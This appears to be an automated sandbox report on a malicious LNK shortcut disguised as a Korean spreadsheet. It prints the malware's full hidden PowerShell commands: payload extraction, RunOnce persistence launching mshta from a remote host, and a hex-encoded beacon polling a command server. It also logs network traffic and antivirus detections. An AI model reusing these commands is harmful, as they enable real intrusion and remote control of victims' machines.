cmdline	powershell -windowstyle hidden $pEbjEn = Get-Location;if($pEbjEn -Match 'System32' -or $pEbjEn -Match 'Program Files') {$pEbjEn = 'C:\Users\test22\AppData\Local\Temp'};$lyHWPSj = Get-ChildItem -Path $pEbjEn -Recurse *.lnk \| where-object {$_.length -eq 0x18C0000} \| Select-Object -ExpandProperty FullName;if($lyHWPSj.GetType() -Match 'Object'){$lyHWPSj = $lyHWPSj[0];};$lyHWPSj;$C5ytw = gc $lyHWPSj -Encoding Byte -TotalCount 74240 -ReadCount 74240;$tyxkEP = 'C:\Users\test22\AppData\Local\Temp\현황조사표.xlsx';sc $tyxkEP ([byte[]]($C5ytw \| select -Skip 62464)) -Encoding Byte; & $tyxkEP;$Cbe1yj = gc $lyHWPSj -Encoding Byte -TotalCount 79888 -ReadCount 79888;$WH9lSPHOFI = 'C:\Users\test22\AppData\Local\Temp\PMmVvG56FLC9y.bat';sc $WH9lSPHOFI ([byte[]]($Cbe1yj \| select -Skip 74342)) -Encoding Byte;& C:\Windows\SysWOW64\cmd.exe /c $WH9lSPHOFI;
cmdline	"C:\Windows\SysWOW64\cmd.exe" /c powershell -windowstyle hidden $pEbjEn = Get-Location;if($pEbjEn -Match 'System32' -or $pEbjEn -Match 'Program Files') {$pEbjEn = 'C:\Users\test22\AppData\Local\Temp'};$lyHWPSj = Get-ChildItem -Path $pEbjEn -Recurse *.lnk ^\| where-object {$_.length -eq 0x18C0000} ^\| Select-Object -ExpandProperty FullName;if($lyHWPSj.GetType() -Match 'Object'){$lyHWPSj = $lyHWPSj[0];};$lyHWPSj;$C5ytw = gc $lyHWPSj -Encoding Byte -TotalCount 74240 -ReadCount 74240;$tyxkEP = 'C:\Users\test22\AppData\Local\Temp\현황조사표.xlsx';sc $tyxkEP ([byte[]]($C5ytw ^\| select -Skip 62464)) -Encoding Byte; ^& $tyxkEP;$Cbe1yj = gc $lyHWPSj -Encoding Byte -TotalCount 79888 -ReadCount 79888;$WH9lSPHOFI = 'C:\Users\test22\AppData\Local\Temp\PMmVvG56FLC9y.bat';sc $WH9lSPHOFI ([byte[]]($Cbe1yj ^\| select -Skip 74342)) -Encoding Byte;^& C:\Windows\SysWOW64\cmd.exe /c $WH9lSPHOFI;
cmdline	REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce /v BackupUserProfiles /t REG_SZ /f /d "C:\Windows\SysWOW64\cmd.exe /c C:\Users\test22\AppData\Roaming\Microsoft\Protect\UserProfileSafeBackup.bat"

Communicates with host for which no DNS query was performed (1 event)

host

75.119.136.207

Installs itself for autorun at Windows startup (2 events)

reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce\BackupUserProfiles				reg_value	C:\Windows\SysWOW64\cmd.exe /c C:\Users\test22\AppData\Roaming\Microsoft\Protect\UserProfileSafeBackup.bat
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce\Olm				reg_value	c:\windows\system32\cmd.exe /c PowerShell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass ping -n 1 -w 311714 2.2.2.2 \|\| mshta http://bian0151.cafe24.com/admin/board/1.html

Network communications indicative of a potential document or script payload download was initiated by the process powershell.exe (50 out of 131 events)

Time & API	Arguments	Status	Return
send Aug. 14, 2023, 9:05 a.m.	buffer: POST /config/bases/config.php?U=TEST22-PC-test22-SH HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 75.119.136.207 Content-Length: 0 Connection: Keep-Alive socket: 1316 sent: 178	1	178
send Aug. 14, 2023, 9:05 a.m.	buffer: POST /config/bases/config.php?U=TEST22-PC-test22-SH HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 75.119.136.207 Content-Length: 0 socket: 1316 sent: 154	1	154
send Aug. 14, 2023, 9:05 a.m.	buffer: POST /config/bases/config.php?U=TEST22-PC-test22-SH HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 75.119.136.207 Content-Length: 0 socket: 1316 sent: 154	1	154
send Aug. 14, 2023, 9:05 a.m.	buffer: POST /config/bases/config.php?U=TEST22-PC-test22-SH HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 75.119.136.207 Content-Length: 0 socket: 1316 sent: 154	1	154
send Aug. 14, 2023, 9:05 a.m.	buffer: POST /config/bases/config.php?U=TEST22-PC-test22-SH HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 75.119.136.207 Content-Length: 0 socket: 1316 sent: 154	1	154
send Aug. 14, 2023, 9:05 a.m.	buffer: POST /config/bases/config.php?U=TEST22-PC-test22-SH HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 75.119.136.207 Content-Length: 0 socket: 1316 sent: 154	1	154
send Aug. 14, 2023, 9:05 a.m.	buffer: POST /config/bases/config.php?U=TEST22-PC-test22-SH HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 75.119.136.207 Content-Length: 0 socket: 1316 sent: 154	1	154
send Aug. 14, 2023, 9:05 a.m.	buffer: POST /config/bases/config.php?U=TEST22-PC-test22-SH HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 75.119.136.207 Content-Length: 0 socket: 1316 sent: 154	1	154
send Aug. 14, 2023, 9:05 a.m.	buffer: POST /config/bases/config.php?U=TEST22-PC-test22-SH HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 75.119.136.207 Content-Length: 0 socket: 1316 sent: 154	1	154
send Aug. 14, 2023, 9:05 a.m.	buffer: POST /config/bases/config.php?U=TEST22-PC-test22-SH HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 75.119.136.207 Content-Length: 0 socket: 1316 sent: 154	1	154
send Aug. 14, 2023, 9:05 a.m.	buffer: POST /config/bases/config.php?U=TEST22-PC-test22-SH HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 75.119.136.207 Content-Length: 0 socket: 1316 sent: 154	1	154
send Aug. 14, 2023, 9:05 a.m.	buffer: POST /config/bases/config.php?U=TEST22-PC-test22-SH HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 75.119.136.207 Content-Length: 0 socket: 1316 sent: 154	1	154
send Aug. 14, 2023, 9:05 a.m.	buffer: POST /config/bases/config.php?U=TEST22-PC-test22-SH HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 75.119.136.207 Content-Length: 0 socket: 1316 sent: 154	1	154
send Aug. 14, 2023, 9:05 a.m.	buffer: POST /config/bases/config.php?U=TEST22-PC-test22-SH HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 75.119.136.207 Content-Length: 0 socket: 1316 sent: 154	1	154
send Aug. 14, 2023, 9:05 a.m.	buffer: POST /config/bases/config.php?U=TEST22-PC-test22-SH HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 75.119.136.207 Content-Length: 0 socket: 1316 sent: 154	1	154
send Aug. 14, 2023, 9:05 a.m.	buffer: POST /config/bases/config.php?U=TEST22-PC-test22-SH HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 75.119.136.207 Content-Length: 0 socket: 1316 sent: 154	1	154
send Aug. 14, 2023, 9:05 a.m.	buffer: POST /config/bases/config.php?U=TEST22-PC-test22-SH HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 75.119.136.207 Content-Length: 0 socket: 1316 sent: 154	1	154
send Aug. 14, 2023, 9:05 a.m.	buffer: POST /config/bases/config.php?U=TEST22-PC-test22-SH HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 75.119.136.207 Content-Length: 0 socket: 1316 sent: 154	1	154
send Aug. 14, 2023, 9:05 a.m.	buffer: POST /config/bases/config.php?U=TEST22-PC-test22-SH HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 75.119.136.207 Content-Length: 0 socket: 1316 sent: 154	1	154
send Aug. 14, 2023, 9:05 a.m.	buffer: POST /config/bases/config.php?U=TEST22-PC-test22-SH HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 75.119.136.207 Content-Length: 0 socket: 1316 sent: 154	1	154
send Aug. 14, 2023, 9:05 a.m.	buffer: POST /config/bases/config.php?U=TEST22-PC-test22-SH HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 75.119.136.207 Content-Length: 0 socket: 1316 sent: 154	1	154
send Aug. 14, 2023, 9:05 a.m.	buffer: POST /config/bases/config.php?U=TEST22-PC-test22-SH HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 75.119.136.207 Content-Length: 0 socket: 1316 sent: 154	1	154
send Aug. 14, 2023, 9:05 a.m.	buffer: POST /config/bases/config.php?U=TEST22-PC-test22-SH HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 75.119.136.207 Content-Length: 0 socket: 1316 sent: 154	1	154
send Aug. 14, 2023, 9:05 a.m.	buffer: POST /config/bases/config.php?U=TEST22-PC-test22-SH HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 75.119.136.207 Content-Length: 0 socket: 1316 sent: 154	1	154
send Aug. 14, 2023, 9:05 a.m.	buffer: POST /config/bases/config.php?U=TEST22-PC-test22-SH HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 75.119.136.207 Content-Length: 0 socket: 1316 sent: 154	1	154
send Aug. 14, 2023, 9:05 a.m.	buffer: POST /config/bases/config.php?U=TEST22-PC-test22-SH HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 75.119.136.207 Content-Length: 0 socket: 1316 sent: 154	1	154
send Aug. 14, 2023, 9:05 a.m.	buffer: POST /config/bases/config.php?U=TEST22-PC-test22-SH HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 75.119.136.207 Content-Length: 0 socket: 1316 sent: 154	1	154
send Aug. 14, 2023, 9:05 a.m.	buffer: POST /config/bases/config.php?U=TEST22-PC-test22-SH HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 75.119.136.207 Content-Length: 0 socket: 1316 sent: 154	1	154
send Aug. 14, 2023, 9:05 a.m.	buffer: POST /config/bases/config.php?U=TEST22-PC-test22-SH HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 75.119.136.207 Content-Length: 0 socket: 1316 sent: 154	1	154
send Aug. 14, 2023, 9:05 a.m.	buffer: POST /config/bases/config.php?U=TEST22-PC-test22-SH HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 75.119.136.207 Content-Length: 0 socket: 1316 sent: 154	1	154
send Aug. 14, 2023, 9:05 a.m.	buffer: POST /config/bases/config.php?U=TEST22-PC-test22-SH HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 75.119.136.207 Content-Length: 0 socket: 1316 sent: 154	1	154
send Aug. 14, 2023, 9:05 a.m.	buffer: POST /config/bases/config.php?U=TEST22-PC-test22-SH HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 75.119.136.207 Content-Length: 0 socket: 1316 sent: 154	1	154
send Aug. 14, 2023, 9:05 a.m.	buffer: POST /config/bases/config.php?U=TEST22-PC-test22-SH HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 75.119.136.207 Content-Length: 0 socket: 1316 sent: 154	1	154
send Aug. 14, 2023, 9:05 a.m.	buffer: POST /config/bases/config.php?U=TEST22-PC-test22-SH HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 75.119.136.207 Content-Length: 0 socket: 1316 sent: 154	1	154
send Aug. 14, 2023, 9:05 a.m.	buffer: POST /config/bases/config.php?U=TEST22-PC-test22-SH HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 75.119.136.207 Content-Length: 0 socket: 1316 sent: 154	1	154
send Aug. 14, 2023, 9:05 a.m.	buffer: POST /config/bases/config.php?U=TEST22-PC-test22-SH HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 75.119.136.207 Content-Length: 0 socket: 1316 sent: 154	1	154
send Aug. 14, 2023, 9:05 a.m.	buffer: POST /config/bases/config.php?U=TEST22-PC-test22-SH HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 75.119.136.207 Content-Length: 0 socket: 1316 sent: 154	1	154
send Aug. 14, 2023, 9:05 a.m.	buffer: POST /config/bases/config.php?U=TEST22-PC-test22-SH HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 75.119.136.207 Content-Length: 0 socket: 1316 sent: 154	1	154
send Aug. 14, 2023, 9:05 a.m.	buffer: POST /config/bases/config.php?U=TEST22-PC-test22-SH HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 75.119.136.207 Content-Length: 0 socket: 1316 sent: 154	1	154
send Aug. 14, 2023, 9:05 a.m.	buffer: POST /config/bases/config.php?U=TEST22-PC-test22-SH HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 75.119.136.207 Content-Length: 0 socket: 1316 sent: 154	1	154
send Aug. 14, 2023, 9:05 a.m.	buffer: POST /config/bases/config.php?U=TEST22-PC-test22-SH HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 75.119.136.207 Content-Length: 0 socket: 1316 sent: 154	1	154
send Aug. 14, 2023, 9:05 a.m.	buffer: POST /config/bases/config.php?U=TEST22-PC-test22-SH HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 75.119.136.207 Content-Length: 0 socket: 1316 sent: 154	1	154
send Aug. 14, 2023, 9:05 a.m.	buffer: POST /config/bases/config.php?U=TEST22-PC-test22-SH HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 75.119.136.207 Content-Length: 0 socket: 1316 sent: 154	1	154
send Aug. 14, 2023, 9:05 a.m.	buffer: POST /config/bases/config.php?U=TEST22-PC-test22-SH HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 75.119.136.207 Content-Length: 0 socket: 1316 sent: 154	1	154
send Aug. 14, 2023, 9:05 a.m.	buffer: POST /config/bases/config.php?U=TEST22-PC-test22-SH HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 75.119.136.207 Content-Length: 0 socket: 1316 sent: 154	1	154
send Aug. 14, 2023, 9:05 a.m.	buffer: POST /config/bases/config.php?U=TEST22-PC-test22-SH HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 75.119.136.207 Content-Length: 0 socket: 1316 sent: 154	1	154
send Aug. 14, 2023, 9:05 a.m.	buffer: POST /config/bases/config.php?U=TEST22-PC-test22-SH HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 75.119.136.207 Content-Length: 0 socket: 1316 sent: 154	1	154
send Aug. 14, 2023, 9:05 a.m.	buffer: POST /config/bases/config.php?U=TEST22-PC-test22-SH HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 75.119.136.207 Content-Length: 0 socket: 1316 sent: 154	1	154
send Aug. 14, 2023, 9:05 a.m.	buffer: POST /config/bases/config.php?U=TEST22-PC-test22-SH HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 75.119.136.207 Content-Length: 0 socket: 1316 sent: 154	1	154
send Aug. 14, 2023, 9:05 a.m.	buffer: POST /config/bases/config.php?U=TEST22-PC-test22-SH HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 75.119.136.207 Content-Length: 0 socket: 1316 sent: 154	1	154

Libraries known to be associated with a CVE were requested (may be False Positive) (1 event)

cve	CVE-2013-3906

One or more non-whitelisted processes were created (3 events)

parent_process	powershell.exe	martian_process	C:\Users\test22\AppData\Local\Temp\현황조사표.xlsx
parent_process	powershell.exe	martian_process	"C:\Program Files (x86)\Microsoft Office\Office12\EXCEL.EXE" /e
parent_process	powershell.exe	martian_process	"C:\Windows\SysWOW64\cmd.exe" /c C:\Users\test22\AppData\Local\Temp\PMmVvG56FLC9y.bat

Resumed a suspended thread in a remote process potentially indicative of process injection (4 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2556 resumed a thread in remote process 2652
Process injection	Process 2992 resumed a thread in remote process 1216
NtResumeThread Aug. 14, 2023, 9:04 a.m.	thread_handle: 0x00000330 suspend_count: 1 process_identifier: 2652	1	0	0
NtResumeThread Aug. 14, 2023, 9:04 a.m.	thread_handle: 0x00000090 suspend_count: 0 process_identifier: 1216	1	0	0

Creates a suspicious Powershell process (4 events)

option	-windowstyle hidden	value	Attempts to execute command with a hidden window
option	-windowstyle hidden	value	Attempts to execute command with a hidden window
option	-windowstyle hidden	value	Attempts to execute command with a hidden window
option	-windowstyle hidden	value	Attempts to execute command with a hidden window

The process powershell.exe wrote an executable file to disk (21 events)

file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe
file	C:\Windows\SysWOW64\cmd.exe

Uses Sysinternals tools in order to add additional command line functionality (2 events)

cmdline

powershell -windowstyle hidden -command "$m6drsidu ="$jWHmcU="""53746172742D536C656570202D5365636F6E64732036373B0D0A246E76536B6C55626151203D2031303234202A20313032343B0D0A247969786773465679203D2024656E763A434F4D50555445524E414D45202B20272D27202B2024656E763A555345524E414D452B272D5348273B0D0A24615777203D2027687474703A2F2F37352E3131392E3133362E3230372F636F6E6669672F62617365732F636F6E6669672E70687027202B20273F553D27202B202479697867734656793B0D0A24624C6D6F69667148774A786845203D2024656E763A54454D50202B20272F4B734B273B0D0A696620282128546573742D506174682024624C6D6F69667148774A7868452929207B0D0A204E65772D4974656D50726F7065727479202D506174682022484B43553A5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E5C52756E4F6E636522202D4E616D65204F6C6D202D56616C75652027633A5C77696E646F77735C73797374656D33325C636D642E657865202F6320506F7765725368656C6C2E657865202D57696E646F775374796C652068696464656E202D4E6F4C6F676F202D4E6F6E496E746572616374697665202D6570206279706173732070696E67202D6E2031202D772033313137313420322E322E322E32207C7C206D7368746120687474703A2F2F6269616E303135312E6361666532342E636F6D2F61646D696E2F626F6172642F312E68746D6C27202D50726F70657274795479706520537472696E67202D466F7263653B0D0A7D0D0A0D0A66756E6374696F6E207576415828245A547864482C202443725A79667375615042597A290D0A7B0D0A20202020246E464B467258484B465651726F4B203D205B53797374656D2E546578742E456E636F64696E675D3A3A555446382E4765744279746573282443725A79667375615042597A293B0D0A202020205B53797374656D2E4E65742E48747470576562526571756573745D2024526E7A67717143203D205B53797374656D2E4E65742E576562526571756573745D3A3A43726561746528245A54786448293B0D0A2020202024526E7A677171432E4D6574686F64203D2027504F5354273B0D0A2020202024526E7A677171432E436F6E74656E7454797065203D20276170706C69636174696F6E2F782D7777772D666F726D2D75726C656E636F646564273B0D0A2020202024526E7A677171432E436F6E74656E744C656E677468203D20246E464B467258484B465651726F4B2E4C656E6774683B0D0A2020202024624C6D6F69667148774A78684555203D2024526E7A677171432E4765745265717565737453747265616D28293B0D0A2020202024624C6D6F69667148774A786845552E577269746528246E464B467258484B465651726F4B2C20302C20246E464B467258484B465651726F4B2E4C656E677468293B0D0A2020202024624C6D6F69667148774A786845552E466C75736828293B0D0A2020202024624C6D6F69667148774A786845552E436C6F736528293B0D0A202020205B53797374656D2E4E65742E48747470576562526573706F6E73655D20245845577742203D2024526E7A677171432E476574526573706F6E736528293B0D0A2020202024464F4F46467A6777564948203D204E65772D4F626A6563742053797374656D2E494F2E53747265616D526561646572282458455777422E476574526573706F6E736553747265616D2829293B0D0A2020202024624C6D6F69667148774A786845554C54203D2024464F4F46467A67775649482E52656164546F456E6428293B0D0A2020202072657475726E2024624C6D6F69667148774A786845554C543B0D0A7D0D0A646F0D0A7B0D0A202020205472797B0D0A2020202020202020246F7A69517575203D207576415820246157772027273B0D0A202020202020202049662028246F7A69517575202D6E6520276E756C6C27202D616E6420246F7A69517575202D6E65202727290D0A20202020202020207B0D0A202020202020202020202020246F7A695175753D246F7A695175752E537562537472696E6728312C20246F7A695175752E4C656E677468202D2032293B0D0A202020202020202020202020246250435A7562724A466F63203D205B53797374656D2E546578742E456E636F64696E675D3A3A555446382E476574537472696E67285B53797374656D2E436F6E766572745D3A3A46726F6D426173653634537472696E6728246F7A6951757529293B0D0A20202020202020202020202069662028246250435A7562724A466F63290D0A2020202020202020202020207B0D0A2020202020202020202020202020202069662028246250435A7562724A466F632E436F6E7461696E732827726567656469743A2729290D0A202020202020202020202020202020207B0D0A2020202020202020202020202020202020202020246D6274447643656E74784B3D246250435A7562724A466F632E537562537472696E672838293B0D0A202020202020202020202020202020202020202024436861724172726179203D246D6274447643656E74784B2E53706C697428277C7C27293B0D0A202020202020202020202020202020202020202069662028244368617241727261792E4C656E677468202D65712035290D0A20202020202020202020202020202020202020207B0D0A2020202020202020202020202020202020202020202020204E65772D4974656D50726F7065727479202D5061746820244368617241727261795B305D202D4E616D6520244368617241727261795B325D202D56616C756520244368617241727261795B345D202D50726F70657274795479706520537472696E67202D466F7263653B0D0A202020202020202020202020202020202020202020202020244372724B684E464F4E46474B203D2027523D27202B205B53797374656D2E436F6E766572745D3A3A546F426173653634537472696E67285B53797374656D2E546578742E456E636F64696E675D3A3A555446382E47657442797465732827454F462729293B0D0A20202020202020202020202020202020202020202020202075764158202461577720244372724B684E464F4E46474B3B0D0A20202020202020202020202020202020202020207D0D0A202020202020202020202020202020207D0D0A202020202020202020202020202020202020202020202020207D0D0A20202020202020207D0D0A202020207D2043617463687B7D0D0A7D7768696C65282474727565202D6571202474727565290D0A2020202053746172742D536C656570202D5365636F6E647320353B""";$nj4KKFFRe="""""";for($xlEKy9tdBWJ=0;$xlEKy9tdBWJ -le $jWHmcU.Length-2;$xlEKy9tdBWJ=$xlEKy9tdBWJ+2){$dYaD=$jWHmcU[$xlEKy9tdBWJ]+$jWHmcU[$xlEKy9tdBWJ+1];$nj4KKFFRe= $nj4KKFFRe+[char]([convert]::toint16($dYaD,16));};Invoke-Command -ScriptBlock ([Scriptblock]::Create($nj4KKFFRe));";Invoke-Command -ScriptBlock ([Scriptblock]::Create($m6drsidu));"

cmdline

C:\Windows\SysWOW64\cmd.exe /c powershell -windowstyle hidden -command "$m6drsidu ="$jWHmcU="""53746172742D536C656570202D5365636F6E64732036373B0D0A246E76536B6C55626151203D2031303234202A20313032343B0D0A247969786773465679203D2024656E763A434F4D50555445524E414D45202B20272D27202B2024656E763A555345524E414D452B272D5348273B0D0A24615777203D2027687474703A2F2F37352E3131392E3133362E3230372F636F6E6669672F62617365732F636F6E6669672E70687027202B20273F553D27202B202479697867734656793B0D0A24624C6D6F69667148774A786845203D2024656E763A54454D50202B20272F4B734B273B0D0A696620282128546573742D506174682024624C6D6F69667148774A7868452929207B0D0A204E65772D4974656D50726F7065727479202D506174682022484B43553A5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E5C52756E4F6E636522202D4E616D65204F6C6D202D56616C75652027633A5C77696E646F77735C73797374656D33325C636D642E657865202F6320506F7765725368656C6C2E657865202D57696E646F775374796C652068696464656E202D4E6F4C6F676F202D4E6F6E496E746572616374697665202D6570206279706173732070696E67202D6E2031202D772033313137313420322E322E322E32207C7C206D7368746120687474703A2F2F6269616E303135312E6361666532342E636F6D2F61646D696E2F626F6172642F312E68746D6C27202D50726F70657274795479706520537472696E67202D466F7263653B0D0A7D0D0A0D0A66756E6374696F6E207576415828245A547864482C202443725A79667375615042597A290D0A7B0D0A20202020246E464B467258484B465651726F4B203D205B53797374656D2E546578742E456E636F64696E675D3A3A555446382E4765744279746573282443725A79667375615042597A293B0D0A202020205B53797374656D2E4E65742E48747470576562526571756573745D2024526E7A67717143203D205B53797374656D2E4E65742E576562526571756573745D3A3A43726561746528245A54786448293B0D0A2020202024526E7A677171432E4D6574686F64203D2027504F5354273B0D0A2020202024526E7A677171432E436F6E74656E7454797065203D20276170706C69636174696F6E2F782D7777772D666F726D2D75726C656E636F646564273B0D0A2020202024526E7A677171432E436F6E74656E744C656E677468203D20246E464B467258484B465651726F4B2E4C656E6774683B0D0A2020202024624C6D6F69667148774A78684555203D2024526E7A677171432E4765745265717565737453747265616D28293B0D0A2020202024624C6D6F69667148774A786845552E577269746528246E464B467258484B465651726F4B2C20302C20246E464B467258484B465651726F4B2E4C656E677468293B0D0A2020202024624C6D6F69667148774A786845552E466C75736828293B0D0A2020202024624C6D6F69667148774A786845552E436C6F736528293B0D0A202020205B53797374656D2E4E65742E48747470576562526573706F6E73655D20245845577742203D2024526E7A677171432E476574526573706F6E736528293B0D0A2020202024464F4F46467A6777564948203D204E65772D4F626A6563742053797374656D2E494F2E53747265616D526561646572282458455777422E476574526573706F6E736553747265616D2829293B0D0A2020202024624C6D6F69667148774A786845554C54203D2024464F4F46467A67775649482E52656164546F456E6428293B0D0A2020202072657475726E2024624C6D6F69667148774A786845554C543B0D0A7D0D0A646F0D0A7B0D0A202020205472797B0D0A2020202020202020246F7A69517575203D207576415820246157772027273B0D0A202020202020202049662028246F7A69517575202D6E6520276E756C6C27202D616E6420246F7A69517575202D6E65202727290D0A20202020202020207B0D0A202020202020202020202020246F7A695175753D246F7A695175752E537562537472696E6728312C20246F7A695175752E4C656E677468202D2032293B0D0A202020202020202020202020246250435A7562724A466F63203D205B53797374656D2E546578742E456E636F64696E675D3A3A555446382E476574537472696E67285B53797374656D2E436F6E766572745D3A3A46726F6D426173653634537472696E6728246F7A6951757529293B0D0A20202020202020202020202069662028246250435A7562724A466F63290D0A2020202020202020202020207B0D0A2020202020202020202020202020202069662028246250435A7562724A466F632E436F6E7461696E732827726567656469743A2729290D0A202020202020202020202020202020207B0D0A2020202020202020202020202020202020202020246D6274447643656E74784B3D246250435A7562724A466F632E537562537472696E672838293B0D0A202020202020202020202020202020202020202024436861724172726179203D246D6274447643656E74784B2E53706C697428277C7C27293B0D0A202020202020202020202020202020202020202069662028244368617241727261792E4C656E677468202D65712035290D0A20202020202020202020202020202020202020207B0D0A2020202020202020202020202020202020202020202020204E65772D4974656D50726F7065727479202D5061746820244368617241727261795B305D202D4E616D6520244368617241727261795B325D202D56616C756520244368617241727261795B345D202D50726F70657274795479706520537472696E67202D466F7263653B0D0A202020202020202020202020202020202020202020202020244372724B684E464F4E46474B203D2027523D27202B205B53797374656D2E436F6E766572745D3A3A546F426173653634537472696E67285B53797374656D2E546578742E456E636F64696E675D3A3A555446382E47657442797465732827454F462729293B0D0A20202020202020202020202020202020202020202020202075764158202461577720244372724B684E464F4E46474B3B0D0A20202020202020202020202020202020202020207D0D0A202020202020202020202020202020207D0D0A202020202020202020202020202020202020202020202020207D0D0A20202020202020207D0D0A202020207D2043617463687B7D0D0A7D7768696C65282474727565202D6571202474727565290D0A2020202053746172742D536C656570202D5365636F6E647320353B""";$nj4KKFFRe="""""";for($xlEKy9tdBWJ=0;$xlEKy9tdBWJ -le $jWHmcU.Length-2;$xlEKy9tdBWJ=$xlEKy9tdBWJ+2){$dYaD=$jWHmcU[$xlEKy9tdBWJ]+$jWHmcU[$xlEKy9tdBWJ+1];$nj4KKFFRe= $nj4KKFFRe+[char]([convert]::toint16($dYaD,16));};Invoke-Command -ScriptBlock ([Scriptblock]::Create($nj4KKFFRe));";Invoke-Command -ScriptBlock ([Scriptblock]::Create($m6drsidu));"

File has been identified by 27 AntiVirus engines on VirusTotal as malicious (27 events)

Lionic	Trojan.WinLNK.Runner.4!c
MicroWorld-eScan	Heur.BZC.YAX.Boxter.949.2AF87C59
VIPRE	Heur.BZC.YAX.Boxter.949.2AF87C59
Cyren	LNK/ABRisk.IJLC-5
Symantec	Trojan.Gen.NPE.C
ESET-NOD32	a variant of Generik.EFPMBAR
Avast	Other:Malware-gen [Trj]
Kaspersky	HEUR:Trojan.Multi.Runner.ag
BitDefender	Heur.BZC.YAX.Boxter.949.2AF87C59
Emsisoft	Heur.BZC.YAX.Boxter.949.2AF87C59 (B)
TrendMicro	HEUR_LNKEXEC.A
FireEye	Heur.BZC.YAX.Boxter.949.2AF87C59
Sophos	Troj/LnkDrop-M
SentinelOne	Static AI - Suspicious LNK
GData	Heur.BZC.YAX.Boxter.949.2C4861AB
Arcabit	Heur.BZC.YAX.Boxter.949.2AF87C59 [many]
ZoneAlarm	HEUR:Trojan.Multi.Runner.ag
Google	Detected
AhnLab-V3	Dropper/LNK.Generic.S2241
ALYac	Heur.BZC.YAX.Boxter.949.2C4861AB
MAX	malware (ai score=81)
VBA32	Trojan.Link.Crafted
Zoner	Probably Heur.LNKScript
Rising	Trojan.PSRunner/LNK!1.BADE (CLASSIC)
Ikarus	Trojan.SuspectCRC
Fortinet	LNK/Agent.24B2!tr
AVG	Other:Malware-gen [Trj]

현황조사표.xlsx.lnk

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All